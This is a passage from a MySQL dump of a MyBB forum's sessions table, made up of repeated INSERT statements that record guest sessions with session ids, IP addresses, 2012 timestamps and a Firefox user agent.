'/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5fb603b64499fe2178b71553794ca01c', '0', '91.215.186.16', '1352771949', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b87da10c0fe43d8113acf09a1dd1e5c', '0', '230.127.187.175', '1352771951', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00627b6c15209f000614db900835325c', '0', '100.21.38.32', '1352771952', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('625964478deeac85becf20d550c7cecb', '0', '50.225.191.12', '1352771953', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8afbbc436a419f4f48bf68cbb0992066', '0', '97.214.134.76', '1352771954', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('592e014de5191e2970f346349722a521', '0', '226.107.95.240', '1352771955', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0cb2949351398f3d8ca0761b18f2a71a', '0', '99.69.151.12', '1352771956', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('acdfae0dfa29c6209a72051ad999c522', '0', '97.104.47.44', '1352771957', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f7bb9cc44f3039d79d79a22b224bb29', '0', '139.40.146.168', '1352771958', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca8ecbe131c54e187203e2762a09306a', '0', '245.183.1.43', '1352771959', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2996b3800fa60a0181155f0753a97999', '0', '201.210.2.71', '1352771960', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('719502cf9ca4d9ab50b339840e09f4b2', '0', '57.44.12.109', '1352771961', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eb6345611a6cb8c35e2d3daeb0e67bfc', '0', '5.16.99.72', '1352771961', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('94995a02dedd4667dbb2b645adbbaef9', '0', '19.69.89.202', '1352771963', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf0c9d31fcd925ef5d9bb39b5efed49d', '0', '33.18.130.218', '1352771965', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b8793595aca211bfcc846b8902ce3b68', '0', '15.195.41.246', '1352771965', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c7eafe212fdc9c7a93eb44860a4eeaa8', '0', '56.248.80.153', '1352771968', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cb8be169592cab0959538fa5335929a4', '0', '176.69.132.43', '1352771970', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74610e2d03be4bf74968aef82706449d', '0', '13.228.240.199', '1352771971', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c746340547bf38886c9bd577e80546ff', '0', '199.216.28.15', '1352771971', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed630336d0f09b832079b3f617697125', '0', '231.66.216.169', '1352771973', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('288be6eb5091bcf1dd962a6dea5f885e', '0', '114.220.121.22', '1352771974', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee5cd562f1380c5b54457143b7816c09', '0', '152.9.211.2', '1352771975', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('294176980749221003819f219d7acf1d', '0', '29.116.71.207', '1352771976', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('26bdc2ff460b4ede961eee530a5d85b5', '0', '51.2.222.223', '1352771977', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('40a957440652e29e43a2a3afac1130f3', '0', '107.234.150.239', '1352771978', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f2f546e33597187f1f7615eaa013c8e', '0', '238.139.15.209', '1352771978', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3a541b5ae0bacacf0108bad05370a47', '0', '71.132.168.231', '1352771979', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f247db49f7b283d05b99e4d47667448', '0', '130.39.199.34', '1352771980', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a6f2648b43bb7c096ab59a646a8ca1da', '0', '86.114.150.123', '1352771981', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca8b55a60a31a631935dddbb3024cd80', '0', '80.252.171.56', '1352771981', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8896736bf21a69f6291afc19c1ae6c8', '0', '83.203.102.127', '1352771986', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc714b5f72ccb8b012edd7ab023e0af4', '0', '77.230.130.39', '1352771987', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41690fa4adc0754a2a08881a0557f3fb', '0', '46.150.202.161', '1352771988', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f89f35cbd0792bb15dfaa57badbdf329', '0', '127.245.48.203', '1352771989', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b941413813ac4b96b7fcb6f60e10622', '0', '183.152.233.83', '1352771995', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e79cfbb89164ee04992bd47707607ba', '0', '82.165.77.85', '1352771996', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e133473ee8b7519ce713682ba2721c1d', '0', '241.26.154.62', '1352771997', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20dd12838488b6c5cc000e68d01c65d5', '0', '154.51.132.38', '1352771998', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ed831b6b5d328a512ccedbc654edcdb', '0', '227.124.77.160', '1352771998', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c75f3283b27e1c93879d93b61fa0aa1', '0', '131.94.85.125', '1352771999', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b441f4932fdca914c886e7280d5fc50f', '0', '92.54.27.228', '1352772000', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20bde2f233fb3672cdaf103a11fe0d0c', '0', '147.199.195.1', '1352772002', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('300233b0e6e1e311e284af35d4c1e8f5', '0', '202.219.92.19', '1352772003', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a2d2d3dffb32de7a52397c56ec42efe', '0', '154.214.206.237', '1352772004', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c332c58fc0ac32bf0d38ab28fe05155c', '0', '145.31.78.21', '1352772005', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6f33be0c2093e2a0c42f32e15bef185', '0', '64.35.94.140', '1352772006', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7204b4fd886b9f9ef4d1e5b96d01d468', '0', '139.172.139.239', '1352772007', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f94ee318705627a9f8538105993865e8', '0', '2.212.235.216', '1352772007', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0775b3bde1a5f554511cd5c024485422', '0', '168.88.111.118', '1352772008', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b447ead921189af06280a0ee9970b4f', '0', '252.61.187.246', '1352772009', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a9e3b0b67af3d7666b88f9a94ef087a0', '0', '82.67.16.234', '1352772010', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d49d5fc81950471d3f172db6bf0b081', '0', '139.105.142.120', '1352772011', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fbff580751115e8e5010ffd652bc16ba', '0', '147.89.113.102', '1352772011', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20c0b379bd642918d85b698dc37d9c96', '0', '215.32.21.208', '1352772013', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84f76d9d333168ed559bf54398672be4', '0', '158.103.81.94', '1352772014', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a78334567380d16c9fb0aa2ec6ad69ad', '0', '163.138.21.227', '1352772015', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed0c4bdbf078f8c0f4f7966f4b71a543', '0', '159.118.186.18', '1352772015', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a64f31e070080e7f9a29554aab2c80b', '0', '120.49.55.213', '1352772016', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b64dc0fd969f3f95f296c12f5a7bf363', '0', '98.59.56.215', '1352772017', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25c5bc571637f6055e113b2f8d721876', '0', '239.30.191.29', '1352772020', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('12cea632435ec7f93412f28748114994', '0', '132.240.238.56', '1352772021', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e1eabe3c66955433abd8348a6ad80ad', '0', '64.129.196.10', '1352772022', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a71890bc43bdb9ff02f1a9099149066', '0', '215.62.193.38', '1352772023', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('087bff4a0440e51a6a64ca7ab8a3d7b5', '0', '160.118.196.241', '1352772026', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('335600c2e810daf3b3bef0ac0d33dd25', '0', '220.10.27.3', '1352772027', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8dc696fdd7a0e6135823bd0fe0a27e18', '0', '42.151.141.45', '1352772028', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0642359127a8be7faea9bf872b5c36bc', '0', '163.60.114.115', '1352772029', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4ea70aa302fcff7014b2ede4fe53db0b', '0', '251.240.78.157', '1352772029', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d94e66dc980220b10054304a9eb9001d', '0', '120.95.248.194', '1352772030', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55a713153768e846c7f74316d7b77919', '0', '112.79.91.123', '1352772034', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6d4a94c498a88f04b10e0b91938bb1ac', '0', '206.143.238.170', '1352772035', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc7b91a0a5cc8b173d53ed2c406595fa', '0', '52.14.235.211', '1352772035', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc96acda6cc53edb0c618f259e930fe8', '0', '97.33.176.191', '1352772036', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('17b823b8b936df5d3182cba354a7a2a4', '0', '66.97.92.171', '1352772038', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a689d04dc3593e1416b0130561b571f1', '0', '245.48.29.45', '1352772038', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7ad94e717fb327dfcb72e9d1ff5ffd37', '0', '167.27.114.128', '1352772039', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80f4263313e2fe80733be19664bec7b7', '0', '125.82.237.217', '1352772040', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a83b4c4e589d864040a78504dbed266', '0', '244.208.159.228', '1352772040', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO 